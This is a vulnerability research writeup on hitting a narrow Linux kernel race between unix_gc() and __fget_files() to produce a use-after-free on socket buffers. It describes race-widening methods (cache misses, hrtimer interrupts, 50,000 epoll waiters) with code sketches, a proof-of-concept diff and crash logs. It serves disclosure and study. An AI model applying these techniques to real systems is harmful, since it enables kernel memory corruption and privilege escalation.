This is a writeup of how I managed to hit the race on a normal Linux desktop kernel, with a hit rate somewhere around 30% if the proof of concept has been tuned for the specific machine. I didn't do a full exploit though, I stopped at getting evidence of use-after-free (UAF) accesses (with the help of a very large file descriptor table and userfaultfd, which might not be available to normal users depending on system configuration) because that's the part I was curious about.

This also demonstrates that even very small race conditions can still be exploitable if someone sinks enough time into writing an exploit, so be careful if you dismiss very small race windows as unexploitable or don't treat such issues as security bugs.

The UAF reproducer is in our bugtracker.

The bug

In the UNIX domain socket garbage collection code (which is needed to deal with reference loops formed by UNIX domain sockets that use SCM_RIGHTS file descriptor passing), the kernel tries to figure out whether it can account for all references to some file by comparing the file's refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.

(The same pattern also appears for files as an optimization in __fdget_pos(), see this LKML thread.)

The problem is that struct file can also be referenced from an RCU read-side critical section (which you can't detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero. For example, when this happens in the dup() syscall, the resulting reference will then be installed in the FD table and be available for subsequent syscalls.

When the garbage collector (GC) believes that it has exclusive access to a file, it will perform operations on that file that violate the locking rules used in normal socket-related syscalls such as recvmsg() - unix_stream_read_generic() assumes that queued SKBs can only be removed under the ->iolock mutex, but the GC removes queued SKBs without using that mutex. (Thanks to Xingyu Jin for explaining that to me.)

One way of looking at this bug is that the GC is working correctly - here's a state diagram showing some of the possible states of a struct file, with more specific states nested under less specific ones and with the state transition in the GC marked:

All relevant states are RCU-accessible. An RCU-accessible object can have either a zero refcount or a positive refcount. Objects with a positive refcount can be either live or owned by the garbage collector. When the GC attempts to grab a file, it transitions from the state "live" to the state "owned by GC" by getting exclusive ownership of all references to the file.

Meanwhile, __fget_files() makes an incorrect assumption about the state of the struct file while it is trying to narrow down its possible states - it checks whether get_file_rcu() / get_file_rcu_many() succeeds, which narrows the file's state down a bit but not far enough:

__fget_files() first uses get_file_rcu() to conditionally narrow the state of a file from "any RCU-accessible state" to "any refcounted state". Then it has to narrow the state from "any refcounted state" to "live", but instead it just assumes that they are equivalent.

And this directly leads to how the bug was fixed (there's another follow-up patch, but that one just tries to clarify the code and recoup some of the resulting performance loss) - the fix adds another check in __fget_files() to properly narrow down the state of the file such that the file is guaranteed to be live:

The fix is to properly narrow the state from "any refcounted state" to "live" by checking whether the file is still referenced by a file descriptor table entry.

The fix ensures that a live reference can only be derived from another live reference by comparing with an FD table entry, which is guaranteed to point to a live object.

[Sidenote: This scheme is similar to the one used for struct page - gup_pte_range() also uses the "grab pointer, increment refcount, recheck pointer" pattern for locklessly looking up a struct page from a page table entry while ensuring that new refcounted references can't be created without holding an existing reference. This is really important for struct page because a page can be given back to the page allocator and reused while gup_pte_range() holds an uncounted reference to it - freed pages still have their struct page, so there's no need to delay freeing of the page - so if this went wrong, you'd get a page UAF.]

My initial suggestion was to instead fix the issue by changing how unix_gc() ensures that it has exclusive access, letting it set the file's refcount to zero to prevent turning RCU references into refcounted ones; this would have avoided adding any code in the hot __fget_files() path, but it would have only fixed unix_gc(), not the __fdget_pos() case I discovered later, so it's probably a good thing this isn't how it was fixed:

[Sidenote: In my original bug report I wrote that you'd have to wait an RCU grace period in the GC for this, but that wouldn't be necessary as long as the GC ensures that a reaped socket's refcount never becomes non-zero again.]

The race

There are multiple race conditions involved in exploiting this bug, but by far the trickiest to hit is that we have to race an operation into the tiny race window in the middle of __fget_files() (which can e.g. be reached via dup()), between the file descriptor table lookup and the refcount increment:

static struct file *__fget_files(struct files_struct *files, unsigned int fd,
                                 fmode_t mask, unsigned int refs)
{
        struct file *file;

        rcu_read_lock();
loop:
        file = files_lookup_fd_rcu(files, fd); // race window start
        if (file) {
                /* File object ref couldn't be taken.
                 * dup2() atomicity guarantee is the reason
                 * we loop to catch the new file (or NULL pointer)
                 */
                if (file->f_mode & mask)
                        file = NULL;
                else if (!get_file_rcu_many(file, refs)) // race window end
                        goto loop;
        }
        rcu_read_unlock();

        return file;
}

In this race window, the file descriptor must be closed (to drop the FD's reference to the file) and a unix_gc() run must get past the point where it checks the file's refcount ("total_refs = file_count(u->sk.sk_socket->file)").

In the Debian 5.10.0-9-amd64 kernel at version 5.10.70-1, that race window looks as follows:

<__fget_files+0x1e> cmp    r10,rax
<__fget_files+0x21> sbb    rax,rax
<__fget_files+0x24> mov    rdx,QWORD PTR [r11+0x8]
<__fget_files+0x28> and    eax,r8d
<__fget_files+0x2b> lea    rax,[rdx+rax*8]
<__fget_files+0x2f> mov    r12,QWORD PTR [rax] ; RACE WINDOW START
; r12 now contains file*
<__fget_files+0x32> test   r12,r12
<__fget_files+0x35> je     ffffffff812e3df7 <__fget_files+0x77>
<__fget_files+0x37> mov    eax,r9d
<__fget_files+0x3a> and    eax,DWORD PTR [r12+0x44] ; LOAD (for ->f_mode)
<__fget_files+0x3f> jne    ffffffff812e3df7 <__fget_files+0x77>
<__fget_files+0x41> mov    rax,QWORD PTR [r12+0x38] ; LOAD (for ->f_count)
<__fget_files+0x46> lea    rdx,[r12+0x38]
<__fget_files+0x4b> test   rax,rax
<__fget_files+0x4e> je     ffffffff812e3def <__fget_files+0x6f>
<__fget_files+0x50> lea    rcx,[rsi+rax*1]
<__fget_files+0x54> lock cmpxchg QWORD PTR [rdx],rcx ; RACE WINDOW END (on cmpxchg success)

As you can see, the race window is fairly small - around 12 instructions, assuming that the cmpxchg succeeds.

Missing some cache

Luckily for us, the race window contains the first few memory accesses to the struct file; therefore, by making sure that the struct file is not present in the fastest CPU caches, we can widen the race window by as much time as the memory accesses take. The standard way to do this is to use an eviction pattern / eviction set; but instead we can also make the cache line dirty on another core (see Anders Fogh's blogpost for more detail). (I'm not actually sure about the intricacies of how much latency this adds on different manufacturers' CPU cores, or on different CPU generations - I've only tested different versions of my proof-of-concept on Intel Skylake and Tiger Lake. Differences in cache coherency protocols or snooping might make a big difference.)

For the cache line containing the flags and refcount of a struct file, this can be done by, on another CPU, temporarily bumping its refcount up and then changing it back down, e.g. with close(dup(fd)) (or just by accessing the FD in pretty much any way from a multithreaded process).

However, when we're trying to hit the race in __fget_files() via dup(), we don't want any cache misses to occur before we hit the race window - that would slow us down and probably make us miss the race. To prevent that from happening, we can call dup() with a different FD number for a warm-up run shortly before attempting the race. Because we also want the relevant cache line in the FD table to be hot, we should choose the FD number for the warm-up run such that it uses the same cache line of the file descriptor table.

An interruption

Okay, a cache miss might be something like a few dozen or maybe hundred nanoseconds or so - that's better, but it's not great. What else can we do to make this tiny piece of code much slower to execute?

On Android, kernels normally set CONFIG_PREEMPT, which would've allowed abusing the scheduler to somehow interrupt the execution of this code. The way I've done this in the past was to give the victim thread a low scheduler priority and pin it to a specific CPU core together with another high-priority thread that is blocked on a read() syscall on an empty pipe (or eventfd); when data is written to the pipe from another CPU core, the pipe becomes readable, so the high-priority thread (which is registered on the pipe's waitqueue) becomes schedulable, and an inter-processor interrupt (IPI) is sent to the victim's CPU core to force it to enter the scheduler immediately.

One problem with that approach, aside from its reliance on CONFIG_PREEMPT, is that any timing variability in the kernel code involved in sending the IPI makes it harder to actually preempt the victim thread in the right spot.

(Thanks to the Xen security team - I think the first time I heard the idea of using an interrupt to widen a race window might have been from them.)

Setting an alarm

A better way to do this on an Android phone would be to trigger the scheduler not from an IPI, but from an expiring high-resolution timer on the same core, although I didn't get it to work (probably because my code was broken in unrelated ways).

High-resolution timers (hrtimers) are exposed through many userspace APIs. Even the timeout of select()/pselect() uses an hrtimer, although this is an hrtimer that normally has some slack applied to it to allow batching it with timers that are scheduled to expire a bit later. An example of a non-hrtimer-based API is the timeout used for reading from a UNIX domain socket (and probably also other types of sockets?), which can be set via SO_RCVTIMEO.

The thing that makes hrtimers "high-resolution" is that they don't just wait for the next periodic clock tick to arrive; instead, the expiration time of the next hrtimer on the CPU core is programmed into a hardware timer. So we could set an absolute hrtimer for some time in the future via something like timer_settime() or timerfd_settime(), and then at exactly the programmed time, the hardware will raise an interrupt! We've made the timing behavior of the OS irrelevant for the second side of the race, the only thing that matters is the hardware! Or... well, almost...

[Sidenote] Absolute timers: Not quite absolute

So we pick some absolute time at which we want to be interrupted, and tell the kernel using a syscall that accepts an absolute time, in nanoseconds. And then when that timer is the next one scheduled, the OS converts the absolute time to whatever clock base/scale the hardware timer is based on, and programs it into hardware. And the hardware usually supports programming timers with absolute time - e.g. on modern X86 (with X86_FEATURE_TSC_DEADLINE_TIMER), you can simply write an absolute Time Stamp Counter (TSC) deadline into MSR_IA32_TSC_DEADLINE, and when that deadline is reached, you get an interrupt. The situation on arm64 is similar, using the timer's comparator register (CVAL).

However, on both X86 and arm64, even though the clockevent subsystem is theoretically able to give absolute timestamps to clockevent drivers (via ->set_next_ktime()), the drivers instead only implement ->set_next_event(), which takes a relative time as argument. This means that the absolute timestamp has to be converted into a relative one, only to be converted back to absolute a short moment later. The delay between those two operations is essentially added to the timer's expiration time.

Luckily this didn't really seem to be a problem for me; if it was, I would have tried to repeatedly call timerfd_settime() shortly before the planned expiry time to ensure that the last time the hardware timer is programmed, the relevant code path is hot in the caches. (I did do some experimentation on arm64, where this seemed to maybe help a tiny bit, but I didn't really analyze it properly.)

A really big list of things to do

Okay, so all the stuff I said above would be helpful on an Android phone with CONFIG_PREEMPT, but what if we're trying to target a normal desktop/server kernel that doesn't have that turned on?

Well, we can still trigger hrtimer interrupts the same way - we just can't use them to immediately enter the scheduler and preempt the thread anymore. But instead of using the interrupt for preemption, we could just try to make the interrupt handler run for a really long time.

Linux has the concept of a "timerfd", which is a file descriptor that refers to a timer. You can e.g. call read() on a timerfd, and that operation will block until the timer has expired. Or you can monitor the timerfd using epoll, and it will show up as readable when the timer expires.

When a timerfd becomes ready, all the timerfd's waiters (including epoll watches), which are queued up in a linked list, are woken up via the wake_up() path - just like when e.g. a pipe becomes readable. Therefore, if we can make the list of waiters really long, the interrupt handler will have to spend a lot of time iterating over that list.

And for any waitqueue that is wired up to a file descriptor, it is fairly easy to add a ton of entries thanks to epoll. Epoll ties its watches to specific FD numbers, so if you duplicate an FD with hundreds of dup() calls, you can then use a single epoll instance to install hundreds of waiters on the file. Additionally, a single process can have lots of epoll instances. I used 500 epoll instances and 100 duplicate FDs, resulting in 50 000 waitqueue items.
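
To illustrate how cheaply such a pile of waiters can be built, here is a userspace sketch in Python (the actual proof of concept is written in C and targets a timerfd; a pipe's read end stands in below, since the same waitqueue mechanism applies to any pollable FD):

import os
import select

r, w = os.pipe()                                 # stand-in for the timerfd

dups = [os.dup(r) for _ in range(100)]           # 100 duplicate FD numbers
epolls = [select.epoll() for _ in range(500)]    # 500 epoll instances

# Each epoll instance watches every duplicate FD number: 500 * 100 = 50,000
# waitqueue items that the wake_up() path must traverse on readiness.
for ep in epolls:
    for fd in dups:
        ep.register(fd, select.EPOLLIN)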

Measuring race outcomes

A nice aspect of this race condition is that if you only hit the difficult race (close() the FD and run unix_gc() while dup() is preempted between FD table lookup and refcount increment), no memory corruption happens yet, but you can observe that the GC has incorrectly removed a socket buffer (SKB) from the victim socket. Even better, if the race fails, you can also see in which direction it failed, as long as no FDs below the victim FD are unused:

  • If dup() returns -1, it was called too late / the interrupt happened too soon: The file* was already gone from the FD table when __fget_files() tried to load it.
  • If dup() returns a file descriptor:
      • If it returns an FD higher than the victim FD, this implies that the victim FD was only closed after dup() had already elevated the refcount and allocated a new FD. This means dup() was called too soon / the interrupt happened too late.
      • If it returns the old victim FD number:
          • If recvmsg() on the FD returned by dup() returns no data, it means the race succeeded: The GC wrongly removed the queued SKB.
          • If recvmsg() returns data, the interrupt happened between the refcount increment and the allocation of a new FD. dup() was called a little bit too soon / the interrupt happened a little bit too late.

Based on this, I repeatedly tested different timing offsets, using a spinloop with a variable number of iterations to skew the timing, and plotted what outcomes the race attempts had depending on the timing skew.

Results: Debian kernel, on Tiger Lake

I tested this on a Tiger Lake laptop, with the same kernel as shown in the disassembly. Note that "0" on the X axis is offset -300 ns relative to the timer's programmed expiry.

This graph shows histograms of race attempt outcomes (too early, success, or too late), with the timing offset at which the outcome occurred on the X axis. The graph shows that depending on the timing offset, up to around 1/3 of race attempts succeeded.

Results: Other kernel, on Skylake

This graph shows similar histograms for a Skylake processor. The exact distribution is different, but again, depending on the timing offset, around 1/3 of race attempts succeeded.

These measurements are from an older laptop with a Skylake CPU. Here "0" on the X axis is offset -1 us relative to the timer. (These timings are from a system that's running a different kernel from the one shown above, but I don't think that makes a difference.)

The exact timings of course look different between CPUs, and they probably also change based on CPU frequency scaling? But still, if you know what the right timing is (or measure the machine's timing before attempting to actually exploit the bug), you could hit this narrow race with a success rate of about 30%!

How important is the cache miss?

The previous section showed that with the right timing, the race succeeds with a probability around 30% - but it doesn't show whether the cache miss is actually important for that, or whether the race would still work fine without it. To verify that, I patched my test code to try to make the file's cache line hot (present in the cache) instead of cold (not present in the cache):

@@ -312,8 +312,10 @@
     }
 
+#if 0
     // bounce socket's file refcount over to other cpu
     pin_to(2);
     close(SYSCHK(dup(RESURRECT_FD+1-1)));
     pin_to(1);
+#endif
 
     //printf("setting timer\n");
@@ -352,5 +354,5 @@
     close(loop_root);
     while (ts_is_in_future(spin_stop))
-      close(SYSCHK(dup(FAKE_RESURRECT_FD)));
+      close(SYSCHK(dup(RESURRECT_FD)));
     while (ts_is_in_future(my_launch_ts)) /*spin*/;

With that patch, the race outcomes look like this on the Tiger Lake laptop:

This graph is a histogram of race outcomes depending on timing offset; it looks similar to the previous graphs, except that almost no race attempts succeed anymore.

But wait, those graphs make no sense!

If you've been paying attention, you may have noticed that the timing graphs I've been showing are really weird. If we were deterministically hitting the race in exactly the same way every time, the timing graph should look like this (looking just at the "too-early" and "too-late" cases for simplicity):

A sketch of a histogram of race outcomes where the "too early" outcome suddenly drops from 100% probability to 0% probability, and a bit afterwards, the "too late" outcome jumps from 0% probability to 100%

Sure, maybe there is some microarchitectural state that is different between runs, causing timing variations - cache state, branch predictor state, frequency scaling, or something along those lines - but a small number of discrete events that haven't been accounted for should just add steps to the graph. (If you're mathematically inclined, you can model that as the result of a convolution of the ideal timing graph with the timing delay distributions of individual discrete events.) For two unaccounted events, that might look like this:

A sketch of a histogram of race outcomes where the "too early" outcome drops from 100% probability to 0% probability in multiple discrete steps, and overlapping that, the "too late" outcome goes up from 0% probability to 100% in multiple discrete steps

But what the graphs are showing is more of a smooth, linear transition, like this:

A sketch of a histogram of race outcomes where the "too early" outcome's share linearly drops while the "too late" outcome's share linearly rises

And that seems to me like there's still something fundamentally wrong. Sure, if there was a sufficiently large number of discrete events mixed together, the curve would eventually just look like a smooth smear - but it seems unlikely to me that there is such a large number of somewhat-evenly distributed random discrete events. And sure, we do get a small amount of timing inaccuracy from sampling the clock in a spinloop, but that should be bounded to the execution time of that spinloop, and the timing smear is far too big for that.

So it looks like there is a source of randomness that isn't a discrete event, but something that introduces a random amount of timing delay within some window. So I became suspicious of the hardware timer. The kernel is using MSR_IA32_TSC_DEADLINE, and the Intel SDM tells us that that thing is programmed with a TSC value, which makes it look as if the timer has very high granularity. But MSR_IA32_TSC_DEADLINE is a newer mode of the LAPIC timer, and the older LAPIC timer modes were instead programmed in units of the APIC timer frequency. According to the Intel SDM, Volume 3A, section 10.5.4 "APIC Timer", that is "the processor’s bus clock or core crystal clock frequency (when TSC/core crystal clock ratio is enumerated in CPUID leaf 0x15) divided by the value specified in the divide configuration register". This frequency is significantly lower than the TSC frequency. So perhaps MSR_IA32_TSC_DEADLINE is actually just a front-end to the same old APIC timer?

I tried to measure the difference between the programmed TSC value and when execution was actually interrupted (not when the interrupt handler starts running, but when the old execution context is interrupted - you can measure that if the interrupted execution context is just running RDTSC in a loop); that looks as follows:

A graph showing noise. Delays from deadline TSC to last successful TSC read before interrupt look essentially random, in the range from around -130 to around 10.

As you can see, the expiry of the hardware timer indeed adds a bunch of noise. The size of the timing difference is also very close to the crystal clock frequency - the TSC/core crystal clock ratio on this machine is 117. So I tried plotting the absolute TSC values at which execution was interrupted, modulo the TSC / core crystal clock ratio, and got this:

A graph showing a clear grouping around 0, roughly in the range -20 to 10, with some noise scattered over the rest of the graph.

This confirms that MSR_IA32_TSC_DEADLINE is (apparently) an interface that internally converts the specified TSC value into less granular bus clock / core crystal clock time, at least on some Intel CPUs.

But there's still something really weird here: The TSC values at which execution seems to be interrupted were at negative offsets relative to the programmed expiry time, as if the timeouts were rounded down to the less granular clock, or something along those lines. To get a better idea of how timer interrupts work, I measured on yet another system (an old Haswell CPU) with a patched kernel when execution is interrupted and when the interrupt handler starts executing relative to the programmed expiry time (and also plotted the difference between the two):

A graph showing that the skid from programmed interrupt time to execution interruption is around -100 to -30 cycles, the skid to interrupt entry is around 360 to 420 cycles, and the time from execution interruption to interrupt entry has much less timing variance and is at around 440 cycles.

So it looks like the CPU starts handling timer interrupts a little bit before the programmed expiry time, but interrupt handler entry takes so long (~450 TSC clock cycles?) that by the time the CPU starts executing the interrupt handler, the timer expiry time has long passed.

Anyway, the important bit for us is that when the CPU interrupts execution due to timer expiry, it's always at a LAPIC timer edge; and LAPIC timer edges happen when the TSC value is a multiple of the TSC/LAPIC clock ratio. An exploit that doesn't take that into account and wrongly assumes that MSR_IA32_TSC_DEADLINE has TSC granularity will have its timing smeared by one LAPIC clock period, which can be something like 40ns.

The ~30% accuracy we could achieve with the existing PoC with the right timing is already not terrible; but if we control for the timer's weirdness, can we do better?

The problem is that we are effectively launching the race with two timers that behave differently: One timer based on calling clock_gettime() in a loop (which uses the high-resolution TSC to compute a time), the other a hardware timer based on the lower-resolution LAPIC clock. I see two options to fix this:

  1. Try to ensure that the second timer is set at the start of a LAPIC clock period - that way, the second timer should hopefully behave exactly like the first (or have an additional fixed offset, but we can compensate for that).
  2. Shift the first timer's expiry time down according to the distance from the second timer to the previous LAPIC clock period (a sketch of this adjustment follows below).

(One annoyance with this is that while we can grab information on how wall/monotonic time is calculated from TSC from the vvar mapping used by the vDSO, the clock is subject to minuscule additional corrections at every clock tick, which occur every 4ms on standard distro kernels (with CONFIG_HZ=250) as long as any core is running.)
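
For option 2, the adjustment itself is a one-liner once the TSC/LAPIC ratio is known - a hedged sketch (how you obtain the ratio, e.g. from CPUID leaf 0x15, and whether the edges sit exactly at multiples of it is machine-specific):

  #include <stdint.h>

  /* Sketch for option 2: assume the hardware timer can only fire at TSC
   * values that are multiples of the TSC / core crystal clock ratio
   * (117 on the Tiger Lake machine above), and shift the spinloop's
   * deadline down to the LAPIC edge the timer will actually use. */
  static uint64_t lapic_edge_before(uint64_t tsc_deadline, uint64_t tsc_per_lapic) {
      return tsc_deadline - (tsc_deadline % tsc_per_lapic);
  }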

I tried to see whether the timing graph would look nicer if I accounted for this LAPIC clock rounding and also used a custom kernel to cheat and control for possible skid introduced by the absolute-to-relative-and-back conversion of the expiry time (see further up), but that still didn't help all that much.

(No) surprise: clock speed matters

Something I should've thought about way earlier is that of course, clock speed matters. On newer Intel CPUs with P-states, the CPU is normally in control of its own frequency, and dynamically adjusts it as it sees fit; the OS just provides some hints.

Linux has an interface that claims to tell you the "current frequency" of each CPU core in /sys/devices/system/cpu/cpufreq/policy<n>/scaling_cur_freq, but when I tried using that, I got a different "frequency" every time I read that file, which seemed suspicious.

Looking at the implementation, it turns out that the value shown there is calculated in arch_freq_get_on_cpu() and its callees - the value is calculated on demand when the file is read, with results cached for around 10 milliseconds. The value is determined as the ratio between the deltas of MSR_IA32_APERF and MSR_IA32_MPERF between the last read and the current one. So if you have some tool that is polling these values every few seconds and wants to show average clock frequency over that time, it's probably a good way of doing things; but if you actually want the current clock frequency, it's not a good fit.
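
For illustration, a hedged user-space approximation of such a helper via the msr driver (assumes root and `modprobe msr`, and tolerates the extra noise from each sample being a syscall; MSR numbers 0xE7/0xE8 are IA32_MPERF/IA32_APERF):

  /* Hedged sketch: approximate "current frequency" by sampling IA32_MPERF
   * (0xE7) and IA32_APERF (0xE8) twice in quick succession via the msr
   * driver. Noisier than an in-kernel helper, since each sample is a
   * syscall. */
  #include <fcntl.h>
  #include <stdint.h>
  #include <stdio.h>
  #include <unistd.h>

  static uint64_t rdmsr(int fd, off_t reg) {
      uint64_t v = 0;
      pread(fd, &v, sizeof(v), reg);
      return v;
  }

  int main(void) {
      int fd = open("/dev/cpu/1/msr", O_RDONLY);
      if (fd < 0) { perror("open msr"); return 1; }
      uint64_t m1 = rdmsr(fd, 0xE7), a1 = rdmsr(fd, 0xE8);
      uint64_t m2 = rdmsr(fd, 0xE7), a2 = rdmsr(fd, 0xE8);
      /* ratio of actual to base clock ticks over the sampling window */
      printf("APERF/MPERF delta ratio: %f\n",
             (double)(a2 - a1) / (double)(m2 - m1));
      return 0;
  }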

I hacked a helper into my kernel that samples both MSRs twice in quick succession, and that gives much cleaner results. When I measure the clock speeds and timing offsets at which the race succeeds, the result looks like this (showing just two clock speeds; the Y axis is the number of race successes at the clock offset specified on the X axis and the frequency scaling specified by the color):

A graph showing that the timing of successful race attempts depends on the CPU's performance setting - at 11/28 performance, most successful race attempts occur around clock offset -1200 (in TSC units), while at 14/28 performance, most successful race attempts occur around clock offset -1000.

So clearly, dynamic frequency scaling has a huge impact on the timing of the race - I guess that's to be expected, really.

But even accounting for all this, the graph still looks kind of smooth, so clearly there is still something more that I'm missing - oh well. I decided to stop experimenting with the race's timing at this point, since I didn't want to sink too much time into it. (Or perhaps I actually just stopped because I got distracted by newer and shinier things?)

Causing a UAF

Anyway, I could probably spend much more time trying to investigate the timing variations (and probably mostly bang my head against a wall because details of execution timing are really difficult to understand in detail, and to understand it completely, it might be necessary to use something like Gamozo Labs' "Sushi Roll" and then go through every single instruction in detail and compare the observations to the internal architecture of the CPU). Let's not do that, and get back to how to actually exploit this bug!

To turn this bug into memory corruption, we have to abuse the fact that the recvmsg() path assumes that SKBs on the receive queue are protected from deletion by the socket mutex, while the GC actually deletes SKBs from the receive queue without taking the socket mutex. For that purpose, while the unix GC is running, we have to start a recvmsg() call that looks up the victim SKB, block until the unix GC has freed the SKB, and then let recvmsg() continue operating on the freed SKB. This is fairly straightforward - while it is a race, we can easily slow down unix_gc() for multiple milliseconds by creating lots of sockets that are not directly referenced from the FD table and have many tiny SKBs queued up - here's a graph showing the unix GC execution time on my laptop, depending on the number of queued SKBs that the GC has to scan through:

A graph showing the time spent per GC run depending on the number of queued SKBs. The relationship is roughly linear.
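
A hedged sketch of that setup (the counts are illustrative, and a real reproducer would have to respect limits like net.unix.max_dgram_qlen and the socket send buffer):

  /* Sketch: build sockets that are only reachable through in-flight FDs
   * (sent via SCM_RIGHTS, then closed locally) and give each a receive
   * queue full of tiny SKBs, so unix_gc() has a lot to scan. */
  #include <string.h>
  #include <sys/socket.h>
  #include <unistd.h>

  static void send_fd(int via, int fd) {
      char c = 'x';
      struct iovec iov = { &c, 1 };
      char cbuf[CMSG_SPACE(sizeof(int))];
      struct msghdr msg = { 0 };
      msg.msg_iov = &iov;
      msg.msg_iovlen = 1;
      msg.msg_control = cbuf;
      msg.msg_controllen = sizeof(cbuf);
      struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
      cm->cmsg_level = SOL_SOCKET;
      cm->cmsg_type = SCM_RIGHTS;
      cm->cmsg_len = CMSG_LEN(sizeof(int));
      memcpy(CMSG_DATA(cm), &fd, sizeof(int));
      sendmsg(via, &msg, 0);
  }

  int main(void) {
      int carrier[2];
      socketpair(AF_UNIX, SOCK_STREAM, 0, carrier);
      for (int i = 0; i < 100; i++) {
          int sk[2];
          socketpair(AF_UNIX, SOCK_DGRAM, 0, sk);
          char c = 0;
          for (int j = 0; j < 100; j++)  /* many tiny queued SKBs */
              write(sk[0], &c, 1);
          send_fd(carrier[0], sk[1]);    /* keep sk[1] alive only in-flight */
          close(sk[0]);
          close(sk[1]);                  /* now only reachable via carrier */
      }
      pause();  /* keep the queues alive while unix_gc() runs elsewhere */
  }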

To turn this into a UAF, it's also necessary to get past the following check near the end of unix_gc():

        /* All candidates should have been detached by now. */
        BUG_ON(!list_empty(&gc_candidates));

gc_candidates is a list that previously contained all sockets that were deemed to be unreachable by the GC. Then, the GC attempted to free all those sockets by eliminating their mutual references. If we manage to keep a reference to one of the sockets that the GC thought was going away, the GC detects that with the BUG_ON().

But we don't actually need the victim SKB to reference a socket that the GC thinks is going away; in scan_inflight(), the GC targets any SKB with a socket that is marked UNIX_GC_CANDIDATE, meaning it just had to be a candidate for being scanned by the GC. So by making the victim SKB hold a reference to a socket that is not directly referenced from a file descriptor table, but is indirectly referenced by a file descriptor table through another socket, we can ensure that the BUG_ON() won't trigger.

I extended my reproducer with this trick and some userfaultfd trickery to make recv() run with the right timing. Nowadays you don't necessarily get full access to userfaultfd as a normal user, but since I'm just trying to show the concept, and there are alternatives to userfaultfd (using FUSE or just slow disk access), that's good enough for this blogpost.

When a normal distro kernel is running normally, the UAF reproducer's UAF accesses won't actually be noticeable; but if you add the kernel command line flag slub_debug=FP (to enable SLUB's poisoning and sanity checks), the reproducer quickly crashes twice, first with a poison dereference and then a poison overwrite detection, showing that one byte of the poison was incremented:

general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] SMP NOPTI
CPU: 1 PID: 2655 Comm: hardirq_loop Not tainted 5.10.0-9-amd64 #1 Debian 5.10.70-1
[...]
RIP: 0010:unix_stream_read_generic+0x72b/0x870
Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89
RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202
RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000
RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246
RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0
R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000
FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0
PKRU: 55555554
Call Trace:
[...]
 unix_stream_recvmsg+0x53/0x70
[...]
 __sys_recvfrom+0x166/0x180
[...]
 __x64_sys_recvfrom+0x25/0x30
 do_syscall_64+0x33/0x80
 entry_SYSCALL_64_after_hwframe+0x44/0xa9
[...]
---[ end trace 39a81eb3a52e239c ]---

=============================================================================
BUG skbuff_head_cache (Tainted: G      D          ): Poison overwritten
-----------------------------------------------------------------------------
INFO: 0x00000000d7142451-0x00000000d7142451 @offset=68. First byte 0x6c instead of 0x6b
INFO: Slab 0x000000002f95c13c objects=32 used=32 fp=0x0000000000000000 flags=0x17ffffc0010200
INFO: Object 0x00000000ef9c59c8 @offset=0 fp=0x00000000100a3918
Object   00000000ef9c59c8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
Object   0000000097454be8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
Object   0000000035f1d791: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
Object   00000000af71b907: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
Object   000000000d2d371e: 6b 6b 6b 6b 6c 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkklkkkkkkkkkkk
Object   0000000000744b35: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
Object   00000000794f2935: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
Object   000000006dc06746: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
Object   000000005fb18682: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
Object   0000000072eb8dd2: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
Object   00000000b5b572a9: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
Object   0000000085d6850b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
Object   000000006346150b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
Object   000000000ddd1ced: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b a5  kkkkkkkkkkkkkkk.
Padding  00000000e00889a7: 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a  ZZZZZZZZZZZZZZZZ
Padding  00000000d190015f: 5a 5a 5a 5a 5a 5a 5a 5a                          ZZZZZZZZ
CPU: 7 PID: 1641 Comm: gnome-shell Tainted: G    B D           5.10.0-9-amd64 #1 Debian 5.10.70-1
[...]
Call Trace:
 dump_stack+0x6b/0x83
 check_bytes_and_report.cold+0x79/0x9a
 check_object+0x217/0x260
[...]
